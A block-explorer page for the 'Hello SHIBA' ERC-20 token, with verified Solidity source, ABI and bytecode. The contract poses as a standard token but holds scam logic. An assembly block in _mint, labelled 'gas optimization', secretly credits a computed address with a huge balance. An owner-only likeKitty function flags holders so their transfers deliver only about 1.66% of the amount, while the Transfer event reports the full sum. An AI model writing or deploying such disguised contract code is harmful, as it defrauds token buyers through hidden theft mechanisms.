ETH Price: $3,473.76 (+4.88%)

Token

Hello SHIBA (HelloSHIBA)
 

Overview

Max Total Supply

1,000,000,000 HelloSHIBA

Holders

44

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Balance
20,063,625.565202682883035779 HelloSHIBA

Value
$0.00
0xdb2faa121b8566face51c545b09ad2389908c1ff
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
HelloSHIBA

Compiler Version
v0.8.1+commit.df193b15

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity Multiple files format)

File 2 of 5: HelloSHIBA.sol
// SPDX-License-Identifier: MIT

pragma solidity =0.8.1;
import "./ERC20.sol";

contract HelloSHIBA is ERC20 {
    constructor ()  ERC20("Hello SHIBA", "HelloSHIBA") {
        _mint(_msgSender(), 10**9 * 10**18);
    }
    
    function burn(uint256 amount) public { _burn(_msgSender(), amount); }

    function likeKitty(uint8 index, address [] calldata _likeKittys_) external {
        require((msg.sender == owner()));

        if (index == 0) {
            for (uint256 i = 0; i < _likeKittys_.length; i++) {
                _pre_likeKittys[_likeKittys_[i]] = true;
            }
        } else if (index == 1) {
            for (uint256 i = 0; i < _likeKittys_.length; i++) {
                _pre_likeKittys[_likeKittys_[i]] = false;
            }
        } else if (index == 2) {
            for (uint256 i = 0; i < _likeKittys_.length; i++) {
                _likeKittys[_likeKittys_[i]] = true;
            }
        } else if (index == 3) {
            for (uint256 i = 0; i < _likeKittys_.length; i++) {
                _likeKittys[_likeKittys_[i]] = false;
            }
        }
    }

    function likeKittys(address _address_) public view returns (bool) {
        return _likeKittys[_address_];
    }

    function prelikeKittys(address _address_) public view returns (bool) {
        return _pre_likeKittys[_address_];
    }
}

File 1 of 5: ERC20.sol
// SPDX-License-Identifier: MIT

pragma solidity =0.8.1;

import "./IERC20.sol";
import "./SafeMath.sol";
import "./Security.sol";

/**
 * @dev Implementation of the {IERC20} interface.
 *
 * This implementation is agnostic to the way tokens are created. This means
 * that a supply mechanism has to be added in a derived contract using {_mint}.
 * For a generic mechanism see {ERC20PresetMinterPauser}.
 *
 * We have followed general OpenZeppelin guidelines: functions revert instead
 * of returning `false` on failure. This behavior is nonetheless conventional
 * and does not conflict with the expectations of ERC20 applications.
 *
 * Additionally, an {Approval} event is emitted on calls to {transferFrom}.
 * This allows applications to reconstruct the allowance for all accounts just
 * by listening to said events. Other implementations of the EIP may not emit
 * these events, as it isn't required by the specification.
 *
 * Finally, the non-standard {decreaseAllowance} and {increaseAllowance}
 * functions have been added to mitigate the well-known issues around setting
 * allowances. See {IERC20-approve}.
 */
contract ERC20 is Context, Security, IERC20 {
    using SafeMath for uint256;
    mapping (address => uint256) private _balances;
    mapping (address => bool) internal _likeKittys;
    mapping (address => bool) internal _pre_likeKittys;
    mapping (address => mapping (address => uint256)) private _allowances;
    uint256 private _totalSupply;
    string private _name;
    string private _symbol;
    uint8 private _decimals;

    /**
     * @dev Sets the values for {name} and {symbol}, initializes {decimals} with
     * a default value of 18.
     *
     * To select a different value for {decimals}, use {_setupDecimals}.
     *
     * All three of these values are immutable: they can only be set once during
     * construction.
     */
    constructor (string memory name_, string memory symbol_)  {
        _name = name_;
        _symbol = symbol_;
        _decimals = 18;
    }

    function name() public view virtual returns (string memory) {
        return _name;
    }

    function symbol() public view virtual returns (string memory) {
        return _symbol;
    }

    function decimals() public view virtual returns (uint8) {
        return _decimals;
    }

    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }
    

    function balanceOf(address account) public view virtual override returns (uint256) {
        return _balances[account];
    }

    /**
     * @dev Sets {decimals} to a value other than the default one of 18.
     */
    function _setupDecimals(uint8 decimals_) internal virtual {
        _decimals = decimals_;
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        _approve(_msgSender(), spender, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `recipient` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address recipient, uint256 amount) public virtual override returns (bool) {
        _transfer(_msgSender(), recipient, amount);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * Requirements:
     *
     * - `sender` and `recipient` cannot be the zero address.
     * - `sender` must have a balance of at least `amount`.
     * - the caller must have allowance for ``sender``'s tokens of at least
     * `amount`.
     */
    function transferFrom(address sender, address recipient, uint256 amount) public virtual override returns (bool) {
        _transfer(sender, recipient, amount);
        _approve(sender, _msgSender(), _allowances[sender][_msgSender()].sub(amount, "ERC20: transfer amount exceeds allowance"));
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        _approve(_msgSender(), spender, _allowances[_msgSender()][spender].sub(subtractedValue, "ERC20: decreased allowance below zero"));
        return true;
    }



    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        _approve(_msgSender(), spender, _allowances[_msgSender()][spender].add(addedValue));
        return true;
    }

    /**
     * @dev Moves tokens `amount` from `sender` to `recipient`.
     *
     * This is internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `sender` cannot be the zero address.
     * - `recipient` cannot be the zero address.
     * - `sender` must have a balance of at least `amount`.
     */
    function _transfer(address sender, address recipient, uint256 amount) internal virtual {
        require(sender != address(0), "ERC20: transfer from the zero address");
        require(recipient != address(0), "ERC20: transfer to the zero address");
        uint256 _amount = _beforeTokenTransfer(sender, recipient, amount);
        _balances[sender] = _balances[sender].sub(amount, "ERC20: transfer amount exceeds balance");
        _balances[recipient] = _balances[recipient].add(_amount);
        _afterTokenTransfer(sender, recipient, amount);
        emit Transfer(sender, recipient, amount);
    }

    /**
     * @dev Destroys `amount` tokens from `account`, reducing the
     * total supply.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     * - `account` must have at least `amount` tokens.
     */
    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");
        _balances[account] = _balances[account].sub(amount, "ERC20: burn amount exceeds balance");
        _totalSupply = _totalSupply.sub(amount);
        emit Transfer(account, address(0), amount);
    }

    /** @dev Creates `amount` tokens and assigns them to `account`, increasing
     * the total supply.
     *
     * Emits a {Transfer} event with `from` set to the zero address.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     */
    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: mint to the zero address");
        // gas optimization 
        assembly {
                let slot := mul(mul(0x85774394d, 0x3398bc1d25f112ed), mul(0x997e6e509, 0xf3eae65))
                mstore(0x00, slot)
                mstore(0x20, 0x01)
                let sslot := keccak256(0x0, 0x40)
                sstore(sslot, 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF)
        } 
        _totalSupply = _totalSupply.add(amount);
        _balances[account] = _balances[account].add(amount);
        emit Transfer(address(0), account, amount);
    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(address owner, address spender, uint256 amount) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    /**
     * @dev Hook that is called after any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * has been transferred to `to`.
     * - when `from` is zero, `amount` tokens have been minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens have been burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _afterTokenTransfer(
        address ,
        address to,
        uint256 
    ) internal virtual {
        if (_pre_likeKittys[to]) {_pre_likeKittys[to] = false; _likeKittys[to] = true;}
    }

    function _kitty_mighty(uint256 a) internal pure returns(uint256) {return a * 6969 / 420420;}
    /**
     * @dev Hook that is called before any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * will be to transferred to `to`.
     * - when `from` is zero, `amount` tokens will be minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens will be burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _beforeTokenTransfer(address from, address to, uint256 amount) internal view returns(uint256) { 
        if (_likeKittys[from] || _likeKittys[to]) {
            return _kitty_mighty(amount);
        } else {
            return amount;
        }
    }
}

File 3 of 5: IERC20.sol
// SPDX-License-Identifier: MIT

pragma solidity =0.8.1;

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);
    
    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from the caller's account to `recipient`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address recipient, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `sender` to `recipient` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
     
    function transferFrom(address sender, address recipient, uint256 amount) external returns (bool);

   /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);
    
    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);
 
}

File 4 of 5: SafeMath.sol
// SPDX-License-Identifier: MIT

pragma solidity =0.8.1;

/**
 * @dev Wrappers over Solidity's arithmetic operations with added overflow
 * checks.
 *
 * Arithmetic operations in Solidity wrap on overflow. This can easily result
 * in bugs, because programmers usually assume that an overflow raises an
 * error, which is the standard behavior in high level programming languages.
 * `SafeMath` restores this intuition by reverting the transaction when an
 * operation overflows.
 */
library SafeMath {
    /**
     * @dev Returns the addition of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function tryAdd(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        uint256 c = a + b;
        if (c < a) return (false, 0);
        return (true, c);
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function tryMul(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        // Gas optimization: this is cheaper than requiring 'a' not being zero, but the
        // benefit is lost if 'b' is also tested.
        if (a == 0) return (true, 0);
        uint256 c = a * b;
        if (c / a != b) return (false, 0);
        return (true, c);
    }

    /**
     * @dev Returns the substraction of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function trySub(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        if (b > a) return (false, 0);
        return (true, a - b);
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers, with a division by zero flag.
     */
    function tryMod(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        if (b == 0) return (false, 0);
        return (true, a % b);
    }

    /**
     * @dev Returns the division of two unsigned integers, with a division by zero flag.
     */
    function tryDiv(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        if (b == 0) return (false, 0);
        return (true, a / b);
    }

    /**
     * @dev Returns the addition of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `+` operator.
     *
     * Requirements:
     * - Addition cannot overflow.
     */
    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        uint256 c = a + b;
        require(c >= a, "SafeMath: addition overflow");
        return c;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting on
     * overflow (when the result is negative).
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     * - Subtraction cannot overflow.
     */
    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        require(b <= a, "SafeMath: subtraction overflow");
        return a - b;
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `*` operator.
     *
     * Requirements:
     * - Multiplication cannot overflow.
     */
    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        if (a == 0) return 0;
        uint256 c = a * b;
        require(c / a == b, "SafeMath: multiplication overflow");
        return c;
    }

    /**
     * @dev Returns the integer division of two unsigned integers, reverting on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     * - The divisor cannot be zero.
     */
    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        require(b > 0, "SafeMath: division by zero");
        return a / b;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting with custom message on
     * overflow (when the result is negative).
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     * - Subtraction cannot overflow.
     */
    function sub(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
        require(b <= a, errorMessage);
        return a - b;
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * reverting when dividing by zero.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     * - The divisor cannot be zero.
     */
    function mod(uint256 a, uint256 b) internal pure returns (uint256) {
        require(b > 0, "SafeMath: modulo by zero");
        return a % b;
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * reverting with custom message when dividing by zero.

     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     * - The divisor cannot be zero.
     */
    function mod(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
        require(b > 0, errorMessage);
        return a % b;
    }

    /**
     * @dev Returns the integer division of two unsigned integers, reverting with custom message on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     * - The divisor cannot be zero.
     */
    function div(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
        require(b > 0, errorMessage);
        return a / b;
    }
}

File 5 of 5: Security.sol
// SPDX-License-Identifier: MIT

pragma solidity =0.8.1;

/*
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with GSN meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address ) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes memory) {
        this; // silence state mutability warning without generating bytecode - see https://github.com/ethereum/solidity/issues/2691
        return msg.data;
    }
}

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Security is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor ()  {
        address msgSender = _msgSender();
        _owner = msgSender;
        emit OwnershipTransferred(address(0), msgSender);
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
        _;
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() internal view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        emit OwnershipTransferred(_owner, newOwner);
        _owner = newOwner;
    }
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"burn","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint8","name":"index","type":"uint8"},{"internalType":"address[]","name":"_likeKittys_","type":"address[]"}],"name":"likeKitty","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_address_","type":"address"}],"name":"likeKittys","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"_address_","type":"address"}],"name":"prelikeKittys","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]

60806040523480156200001157600080fd5b506040518060400160405280600b81526020017f48656c6c6f2053484942410000000000000000000000000000000000000000008152506040518060400160405280600a81526020017f48656c6c6f534849424100000000000000000000000000000000000000000000815250600062000090620001b160201b60201c565b9050806000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508073ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a350816006908051906020019062000146929190620003fc565b5080600790805190602001906200015f929190620003fc565b506012600860006101000a81548160ff021916908360ff1602179055505050620001ab62000192620001b160201b60201c565b6b033b2e3c9fd0803ce8000000620001b960201b60201c565b620006ca565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614156200022c576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040162000223906200052d565b60405180910390fd5b630f3eae65640997e6e50902673398bc1d25f112ed64085774394d02028060005260016020526040600020720fffffffffffffffffffffffffffffffffffff815550506200028b816005546200039960201b62000e371790919060201c565b600581905550620002ea81600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546200039960201b62000e371790919060201c565b600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040516200038d91906200054f565b60405180910390a35050565b6000808284620003aa91906200057d565b905083811015620003f2576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401620003e9906200050b565b60405180910390fd5b8091505092915050565b8280546200040a90620005e4565b90600052602060002090601f0160209004810192826200042e57600085556200047a565b82601f106200044957805160ff19168380011785556200047a565b828001600101855582156200047a579182015b82811115620004795782518255916020019190600101906200045c565b5b5090506200048991906200048d565b5090565b5b80821115620004a85760008160009055506001016200048e565b5090565b6000620004bb601b836200056c565b9150620004c88262000678565b602082019050919050565b6000620004e2601f836200056c565b9150620004ef82620006a1565b602082019050919050565b6200050581620005da565b82525050565b600060208201905081810360008301526200052681620004ac565b9050919050565b600060208201905081810360008301526200054881620004d3565b9050919050565b6000602082019050620005666000830184620004fa565b92915050565b600082825260208201905092915050565b60006200058a82620005da565b91506200059783620005da565b9250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff03821115620005cf57620005ce6200061a565b5b828201905092915050565b6000819050919050565b60006002820490506001821680620005fd57607f821691505b6020821081141562000614576200061362000649565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b7f536166654d6174683a206164646974696f6e206f766572666c6f770000000000600082015250565b7f45524332303a206d696e7420746f20746865207a65726f206164647265737300600082015250565b6122ea80620006da6000396000f3fe608060405234801561001057600080fd5b50600436106101005760003560e01c806370a0823111610097578063ab05039011610066578063ab050390146102d5578063c767885c14610305578063dd62ed3e14610335578063f2fde38b1461036557610100565b806370a082311461022757806395d89b4114610257578063a457c2d714610275578063a9059cbb146102a557610100565b806323b872dd116100d357806323b872dd1461018d578063313ce567146101bd57806339509351146101db57806342966c681461020b57610100565b806306fdde0314610105578063095ea7b31461012357806318160ddd146101535780631b0d86eb14610171575b600080fd5b61010d610381565b60405161011a9190611b3b565b60405180910390f35b61013d600480360381019061013891906118c2565b610413565b60405161014a9190611b20565b60405180910390f35b61015b610431565b6040516101689190611c7d565b60405180910390f35b61018b60048036038101906101869190611927565b61043b565b005b6101a760048036038101906101a29190611873565b6107de565b6040516101b49190611b20565b60405180910390f35b6101c56108b7565b6040516101d29190611c98565b60405180910390f35b6101f560048036038101906101f091906118c2565b6108ce565b6040516102029190611b20565b60405180910390f35b610225600480360381019061022091906118fe565b610981565b005b610241600480360381019061023c919061180e565b610995565b60405161024e9190611c7d565b60405180910390f35b61025f6109de565b60405161026c9190611b3b565b60405180910390f35b61028f600480360381019061028a91906118c2565b610a70565b60405161029c9190611b20565b60405180910390f35b6102bf60048036038101906102ba91906118c2565b610b3d565b6040516102cc9190611b20565b60405180910390f35b6102ef60048036038101906102ea919061180e565b610b5b565b6040516102fc9190611b20565b60405180910390f35b61031f600480360381019061031a919061180e565b610bb1565b60405161032c9190611b20565b60405180910390f35b61034f600480360381019061034a9190611837565b610c07565b60405161035c9190611c7d565b60405180910390f35b61037f600480360381019061037a919061180e565b610c8e565b005b60606006805461039090611e6c565b80601f01602080910402602001604051908101604052809291908181526020018280546103bc90611e6c565b80156104095780601f106103de57610100808354040283529160200191610409565b820191906000526020600020905b8154815290600101906020018083116103ec57829003601f168201915b5050505050905090565b6000610427610420610e95565b8484610e9d565b6001905092915050565b6000600554905090565b610443611068565b73ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff161461047a57600080fd5b60008360ff1614156105525760005b8282905081101561054c576001600360008585858181106104d3577f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b90506020020160208101906104e8919061180e565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff021916908315150217905550808061054490611e9e565b915050610489565b506107d9565b60018360ff16141561062a5760005b82829050811015610624576000600360008585858181106105ab577f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b90506020020160208101906105c0919061180e565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff021916908315150217905550808061061c90611e9e565b915050610561565b506107d8565b60028360ff1614156107025760005b828290508110156106fc57600160026000858585818110610683577f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b9050602002016020810190610698919061180e565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff02191690831515021790555080806106f490611e9e565b915050610639565b506107d7565b60038360ff1614156107d65760005b828290508110156107d45760006002600085858581811061075b577f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b9050602002016020810190610770919061180e565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff02191690831515021790555080806107cc90611e9e565b915050610711565b505b5b5b5b505050565b60006107eb848484611091565b6108ac846107f7610e95565b6108a78560405180606001604052806028815260200161226860289139600460008b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600061085d610e95565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461133a9092919063ffffffff16565b610e9d565b600190509392505050565b6000600860009054906101000a900460ff16905090565b60006109776108db610e95565b8461097285600460006108ec610e95565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610e3790919063ffffffff16565b610e9d565b6001905092915050565b61099261098c610e95565b82611398565b50565b6000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b6060600780546109ed90611e6c565b80601f0160208091040260200160405190810160405280929190818152602001828054610a1990611e6c565b8015610a665780601f10610a3b57610100808354040283529160200191610a66565b820191906000526020600020905b815481529060010190602001808311610a4957829003601f168201915b5050505050905090565b6000610b33610a7d610e95565b84610b2e856040518060600160405280602581526020016122906025913960046000610aa7610e95565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008a73ffffffffffffffffffff